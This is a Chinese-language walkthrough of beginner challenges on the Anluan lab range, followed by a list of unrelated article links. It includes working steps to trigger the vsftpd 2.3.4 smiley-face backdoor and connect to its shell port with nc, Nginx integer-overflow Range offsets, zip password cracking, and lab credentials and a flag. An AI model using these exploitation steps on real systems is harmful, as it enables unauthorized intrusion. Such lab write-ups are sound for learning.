当前位置: 首页 > news >正文

安鸾学院靶场——安全基础

文章目录

    • 1、Burp抓包
    • 2、指纹识别
    • 3、压缩包解密
    • 4、Nginx整数溢出漏洞
    • 5、PHP代码基础
    • 6、linux基础命令
    • 7、Mysql数据库基础
    • 8、目录扫描
    • 9、端口扫描
    • 10、docker容器基础
    • 11、文件类型

1、Burp抓包

抓取http://47.100.220.113:8007/的返回包,可以拿到包含flag的txt文件。
在这里插入图片描述
访问http://47.100.220.113:8007/27726623fabee80870ab072b70178308.txt,获取flag。
在这里插入图片描述

2、指纹识别

使用whatweb进行指纹识别,命令whatweb http://47.100.220.113:8109/,获取flag。
在这里插入图片描述
whatweb -v http://47.100.220.113:8109/-v查看详细信息
在这里插入图片描述

3、压缩包解密

下载提供的flag.zip和wordlist.txt,使用fcrackzip工具破解zip密码,命令:

fcrackzip -D -p Wordlist.txt -u flag.zip
# -D:代表使用字典
# -p:指定字典
# -u:只显示破解出来的密码,其他错误的密码不显示出

在这里插入图片描述

4、Nginx整数溢出漏洞

Nginx整数溢出漏洞的影响版本:Nginx 0.5.6 – 1.13.2
注意两个响应头:

X-Proxy-Cache: HIT  # 表示命中
X-Proxy-Cache: MISS # 表示未命中

漏洞利用:

range1= 17208 # 请求demo.png,返回包大小为16585,要想向前读取数据,差值最好保持在600
range2= 0×8000000000000000-17208=9,223,372,036,854,767,331
Range: -range1,-range2 # 使用负数

在这里插入图片描述

5、PHP代码基础

直接使用system函数执行系统命令
在这里插入图片描述
在这里插入图片描述

6、linux基础命令

ssh远程连接命令:

ssh <usrname>@<ip> -p <port>
ssh test@47.100.220.113 -p 2233

在这里插入图片描述
find命令查询文件:

find / -name "*flag*" -type f 2>/dev/null # 在/目录下寻找文件名为*flag*的文件,不显示报错信息
flag{82782fd75008071871ad76e3a8b8794d}

九阴真经上卷找不到,似乎被删了,只有下卷。

7、Mysql数据库基础

手工ssh隧道转发

ssh -g -f -N -L 8888:mysql:3306 test@47.100.220.113 -p 2244 # 密码为:whalwl@wuhan
# -g:此选项允许远程主机连接到本地端口转发的绑定地址上。
# -f:此选项让 SSH 在后台运行,即以守护进程模式执行。这样可以在启动 SSH 连接后立即返回到命令提示符,而不会阻塞终端。
# -N:此选项指示 SSH 不要执行任何远程命令。通常,SSH 会尝试登录到远程主机并执行指定的命令,但在此情况下,我们只需要创建端口转发而不需要远程执行命令。
# -L 8888:mysql:3306:这是端口转发的设置部分。-L 后面的参数指定了本地端口、目标主机和目标端口的对应关系。
# 在本地主机上创建一个 SSH 连接,并将本地的 8888 端口转发到远程的 MySQL 服务器的 3306 端口。mysql -h127.0.0.1 -P8888 -utest -ptest

在这里插入图片描述

flag在whalwl数据库中。

Navicat连接
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

8、目录扫描

命令:

python dirsearch.py -u http://47.100.220.113:8008/ -w dicc.txt -e php -t 1 -m head
# -u:指定域名
# -w:指定字典
# -e:指定扫描的文件拓展名
# -t:设置线程
# -m:设置请求方式,head请求只返回响应头,没有返回内容

在这里插入图片描述

看wp是由web.zip文件的,但是这里没有,所以搞不定了。

9、端口扫描

使用nmap进行端口扫描:

nmap -p 10021 -sV 47.100.220.113
# -p:指定端口
# -sV:探测服务版本

在这里插入图片描述

vsftpd 2.3.4存在一个经典的笑脸漏洞~

笑脸漏洞原理:在vsftpd 2.3.4版本中,在登录输入用户名时输入:)类似于笑脸的符号,会导致服务处理开启6200后门端口,直接执行系统命令。注意:10021端口上ftp的后门端口为16200。

ftp 47.100.220.113 -P 10021 # ftp连接
kali:) # 用户名
kali # 密码nc 47.100.220.113 16200

在这里插入图片描述

10、docker容器基础

docker pull registry.cn-shanghai.aliyuncs.com/whalwl/docker_test # 拉取镜像
docker run -it registry.cn-shanghai.aliyuncs.com/whalwl/docker_test /bin/bash # 创建容器,并进入容器,退出会自动停止容器
find / -name "*fla*" -type f 2>/dev/null # 查找flag文件
cat /root/this_is_flag

在这里插入图片描述
在这里插入图片描述

11、文件类型

下载给的文件后进行解压

tar -zxvf flag.tar.gz # 解压出flag文件
file flag     # 识别file文件类型
unzip flag    # 解压,会得到五个flag文件

在这里插入图片描述

file flag-1 # 为JPEG图片文件,直接打开

在这里插入图片描述
在这里插入图片描述

file flag-2 # 为exe文件,linux下不能运行exe文件,需要放到windows下运行
# 注意改名为flag-2.exe

在这里插入图片描述

file flag-3 # 为ELF文件,linux下能直接运行
./flag-3

在这里插入图片描述

file flag-4 # 为PE32可执行文件,linux下不能直接运行,添加.exe的后缀放到windows下运行

在这里插入图片描述
添加完后,根据icon,可以看出这是一个python打包成的exe程序。python解包
在这里插入图片描述

file flag-4 # 为PE32可执行文件,linux下不能直接运行,添加.exe的后缀放到windows下运行
python pyinstxtractor.py flag-4.exe # 解包

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

file flag-5 # 为JAR文件,直接用zip解压
unzip flag-5 

在这里插入图片描述
使用jd-gui对class文件反编译
在这里插入图片描述

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • Vivado时序报告之Datasheet详解
  • Mocha Pro 2024 v11.0.1 Mac版摄像机反求跟踪插件更新:优化AE/PR/OFX/达芬奇工作流程
  • 设置ingress的会话保持
  • Integrated Surface Dataset 全球气象站点小时数据获取方式
  • vue2+echarts:echarts在dialog弹框中不显示的解决方案
  • 使用Docker-Java监听Docker容器的信息
  • C++面向对象:多态性
  • C数据结构:排序
  • Mock数据
  • 第2章 Rust初体验5/8:match表达式和模式匹配:更富表达力:猜骰子冷热游戏
  • 181.二叉树:验证二叉树(力扣)
  • STM32CUBEIDE使用技巧
  • docker——基础知识
  • 08_第八章 微头条项目开发
  • Spring系统学习 - Bean的作用域
  • (ckeditor+ckfinder用法)Jquery,js获取ckeditor值
  • [译]如何构建服务器端web组件,为何要构建?
  • 【干货分享】SpringCloud微服务架构分布式组件如何共享session对象
  • 11111111
  • angular2开源库收集
  • ES6--对象的扩展
  • js算法-归并排序(merge_sort)
  • MQ框架的比较
  • Python学习之路13-记分
  • RedisSerializer之JdkSerializationRedisSerializer分析
  • SwizzleMethod 黑魔法
  • Zepto.js源码学习之二
  • 大快搜索数据爬虫技术实例安装教学篇
  • 订阅Forge Viewer所有的事件
  • 干货 | 以太坊Mist负责人教你建立无服务器应用
  • 基于web的全景—— Pannellum小试
  • 让你成为前端,后端或全栈开发程序员的进阶指南,一门学到老的技术
  • 微信如何实现自动跳转到用其他浏览器打开指定页面下载APP
  • 摩拜创始人胡玮炜也彻底离开了,共享单车行业还有未来吗? ...
  • ​​​​​​​ubuntu16.04 fastreid训练过程
  • ###C语言程序设计-----C语言学习(6)#
  • #每日一题合集#牛客JZ23-JZ33
  • (C语言)输入一个序列,判断是否为奇偶交叉数
  • (delphi11最新学习资料) Object Pascal 学习笔记---第2章第五节(日期和时间)
  • (k8s中)docker netty OOM问题记录
  • (ZT)出版业改革:该死的死,该生的生
  • (办公)springboot配置aop处理请求.
  • (顶刊)一个基于分类代理模型的超多目标优化算法
  • (二)WCF的Binding模型
  • (二)丶RabbitMQ的六大核心
  • (附源码)springboot“微印象”在线打印预约系统 毕业设计 061642
  • (附源码)计算机毕业设计ssm本地美食推荐平台
  • (回溯) LeetCode 78. 子集
  • (六)Flink 窗口计算
  • (七)c52学习之旅-中断
  • (转)机器学习的数学基础(1)--Dirichlet分布
  • (转载)利用webkit抓取动态网页和链接
  • .gitignore文件忽略的内容不生效问题解决
  • .MyFile@waifu.club.wis.mkp勒索病毒数据怎么处理|数据解密恢复
  • .Net OpenCVSharp生成灰度图和二值图